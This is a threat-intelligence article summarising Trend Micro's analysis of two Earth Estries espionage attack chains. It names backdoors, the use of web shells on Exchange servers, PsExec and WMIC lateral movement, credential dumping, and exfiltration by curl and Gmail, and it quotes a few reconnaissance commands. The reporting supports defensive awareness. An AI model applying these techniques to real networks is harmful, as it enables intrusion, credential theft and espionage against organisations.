Varied Attack Chains from Earth Estries Uncover New Espionage Tactics
Varied Attack Chains from Earth Estries Uncover New Espionage Tactics
A series of cyberattacks attributed to Earth Estries is unveiled by Trend Micro's threat researchers, providing insights into the tactics, techniques, and procedures (TTPs) of this threat actor. Trend Micro's recent analysis builds on prior reporting from August 2024, of a threat actor identified with overlaps to the adversary group FamousSparrow (aka GhostEmperor and Salt Typhoon). Salt Typhoon, a Chinese state-backed cyber-espionage group with a suspected connection to the country’s foreign intelligence operations, has been tied in recent months to cyber campaigns targeting government, telecommunications, and technology organizations in the United States and beyond. Active since at least 2020, Earth Estries has demonstrated various capabilities in its intrusions, deploying various tools, backdoor malware, and exploiting vulnerable servers.
Trend Micro outlines two distinct attack chains, noting both similarities and differences. "There are some commonalities between the two attack chains, such as abuse of vulnerable attack surfaces such as Microsoft Exchange servers and network adapter management tools. However, there are also significant differences. The first chain employs PsExec and WMIC for lateral movement, using tools such as Cobalt Strike, TrillClient, Hemigate, and Crowdoor, which are delivered via CAB file packages. The second chain showcases a different approach, using malware such as Zingdoor, Cobalt Strike, and SnappyBee, as well as utility tools like PortScan and NinjaCopy, which are delivered via curl downloads."
The first chain begins by exploiting vulnerabilities in web management tools such as QConvergeConsole to gain initial access, followed by deploying Cobalt Strike and a custom backdoor, Crowdoor. Though absent in this attack, HemiGate is another second-stage backdoor associated with Earth Estries. Once initial access is achieved, the attackers conduct reconnaissance on domain accounts using the command net group "domain admins" /domain. They then leverage cmd.exe to transfer a malicious go4.cab file to the C$ admin share, use the expand command to extract files from "go4.cab", and execute a batch script, "g2.bat", remotely on the target system via PsExec. Remote command execution is also initiated with WMIC to distribute additional tools and scripts. Trend Micro's analysis of Crowdoor found it capable of interacting "with the Cobalt Strike installation, in keeping with Earth Estries’ tools, tactics, and procedures (TTPs) of cleaning up and reinstalling tools. Both instances of Crowdoor and the reinstalled Cobalt Strike were brought in as CAB files by preceding instances." Crowdoor further establishes persistence by modifying the registry Run key or creating a new service, injecting itself into the “msiexec.exe” process. The TrillClient information stealer is also deployed to gather user credentials and browser data, which is then compressed and exfiltrated using RAR and PowerShell scripts. The script utilizes “xcopy” and “attrib” with flags “-a,” “-s,” “-r,” and “-h” to modify attributes and prepare files for exfiltration to the attacker's Gmail account.
In the second attack chain, Earth Estries exploits vulnerabilities in Microsoft Exchange servers to install web shells, notably China Chopper, which delivers additional malware, including Cobalt Strike, Zingdoor, and Snappybee (Deed RAT). In sequence, the web shell ran commands to run discovery starting with "whoami", "tasklist" and "dir." Then use "curl" to download payloads and establish persistence with newly created scheduled tasks using "schtasks." Scheduled tasks are also created remotely using WMIC commands, and new services are configured to secure access. Tools like PortScan are used for network discovery, scanning ports 80, 443, 445, and 3389 to map connected systems for further malware deployment. Additional tactics include creating remote services with “sc,” establishing network connections with “net use,” and loading DLLs via “rundll32.exe” and “msiexec.exe.” Credential dumping is performed with NinjaCopy, which is evident from the successful extraction of the SYSTEM registry hive. As in the first attack chain, data is collected using RAR and exfiltrated with “curl” to anonymized file-sharing services.
Earth Estries' tactics reflect an intent to gather sensitive information aligned with espionage objectives. Earth Estries demonstrates adaptability throughout its campaigns, using widely known vulnerabilities and custom backdoors like Crowdoor and Snappybee to evade detection and expand its reach. Trend Micro states, “Earth Estries’ methods reflect a sophisticated approach to multi-layered cyber espionage that prioritizes persistence and extensive data collection.” The group’s connections to Salt Typhoon raise additional concerns, as demonstrated by their recently executed breaches.